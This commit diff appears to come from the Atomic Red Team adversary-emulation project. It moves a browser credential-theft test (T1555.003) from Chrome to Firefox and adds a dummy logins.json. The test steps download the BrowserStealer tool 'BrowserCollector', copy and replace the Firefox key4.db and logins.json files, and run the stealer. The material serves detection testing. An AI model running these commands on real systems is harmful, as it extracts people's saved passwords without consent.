Update BrowserCollector to use Firefox (#2724)

atomics/T1555.003/T1555.003.yaml

@@ -429,16 +429,15 @@ atomic_tests:
   dependency_executor_name: powershell
   dependencies:
   - description: |
-      Google Chrome must be on the device.
+      Firefox must be on the device.
     prereq_command: |
-      if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}
+      if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1}
     get_prereq_command: |
       New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-      $installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi"
-      Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
-      msiexec /i $installer /qn
-      Start-Process -FilePath "chrome.exe"
-      Stop-Process -Name "chrome"
+      $installer = "PathToAtomicsFolder\..\ExternalPayloads\FirefoxStubInstaller.exe"
+      Invoke-WebRequest -OutFile $installer "https://download.mozilla.org/?product=firefox-stub&os=win&lang=en-US"
+      Start-Process -FilePath $installer -Wait
+      Stop-Process -Name "firefox"
   - description: |
       BrowserCollector must exist in the bin directory
     prereq_command: |
@@ -447,22 +446,30 @@ atomic_tests:
       New-Item -Type Directory "PathToAtomicsFolder\T1555.003\bin\" -ErrorAction Ignore -Force | Out-Null
       Invoke-WebRequest "https://github.com/SaulBerrenson/BrowserStealer/releases/download/1.0.0.4/BrowserCollector_x64.exe" -Outfile: "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe"
   - description: |
-      Login Data file that is a copy of a chrome Login Data that contains credentials for the tool to "steal." Must exist at the specified path.
+      Login Data file that is a copy of a Firefox Login Data that contains credentials for the tool to "steal." Must exist at the specified path.
     prereq_command: |-
-      if (Test-Path "PathToAtomicsFolder\T1555.003\src\Login Data") {exit 0} else {exit 1}
+      if (Test-Path "PathToAtomicsFolder\T1555.003\src\key4.db") {exit 0} else {exit 1}
     get_prereq_command: |-
-      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/Login%20Data?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\Login Data"
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/key4.db?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\key4.db"
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/logins.json?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\logins.json" 
   executor:
     command: |
-      Copy-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -Destination "PathToAtomicsFolder\..\ExternalPayloads" > $null
-      Remove-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null
-      Copy-Item "$env:PathToAtomicsFolder\T1555.003\src\Login Data" -Destination "$env:localappdata\Google\Chrome\User Data\Default\" > $null
+      $profile = (Gci -filter "*default-release*" -path $env:Appdata\Mozilla\Firefox\Profiles\).FullName
+      Copy-Item $profile\key4.db -Destination "PathToAtomicsFolder\..\ExternalPayloads" > $null
+      Copy-Item $profile\logins.json -Destination "PathToAtomicsFolder\..\ExternalPayloads" > $null
+      Remove-Item $profile\key4.db > $null
+      Remove-Item $profile\logins.json > $null
+      Copy-Item "$env:PathToAtomicsFolder\T1555.003\src\key4.db" -Destination $profile\ > $null
+      Copy-Item "$env:PathToAtomicsFolder\T1555.003\src\logins.json" -Destination $profile\ > $null
       cd "$env:PathToAtomicsFolder\T1555.003\bin"
-      .\BrowserCollector.exe
+      ""|.\BrowserCollector.exe
     cleanup_command: |
-      Remove-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null
-      Copy-Item "PathToAtomicsFolder\..\ExternalPayloads" -Destination "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null
-      Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\Login Data" > $null
+      $profile = (Gci -filter "*default-release*" -path $env:Appdata\Mozilla\Firefox\Profiles\).FullName
+      Remove-Item $profile\key4.db > $null
+      Remove-Item $profile\logins.json > $null
+      Copy-Item "PathToAtomicsFolder\..\ExternalPayloads" -Destination $profile\ > $null
+      Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\key4.db" > $null
+      Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\logins.json" > $null
     name: powershell
 - name: Dump Chrome Login Data with esentutl
   auto_generated_guid: 70422253-8198-4019-b617-6be401b49fce

atomics/T1555.003/src/logins.json

@@ -0,0 +1 @@
+{"nextId":2,"logins":[{"id":1,"hostname":"https://practicetestautomation.com","httpRealm":null,"formSubmitURL":"https://practicetestautomation.com","usernameField":"username","passwordField":"password","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECJaRexB+HxT7BAhePSimnBX5dQ==","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECFs3vPPQrqJqBBDDqJi5FTWY9ci3V3PAspHl","guid":"{f4496af2-67e3-4e71-a6e0-a9215c8fea68}","encType":1,"timeCreated":1702659643977,"timeLastUsed":1702659643977,"timePasswordChanged":1702659643977,"timesUsed":1,"syncCounter":1,"everSynced":false,"encryptedUnknownFields":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECCB2pMUVOobJBAhvCulcD3S7Nw=="}],"potentiallyVulnerablePasswords":[],"dismissedBreachAlertsByLoginGUID":{},"version":3}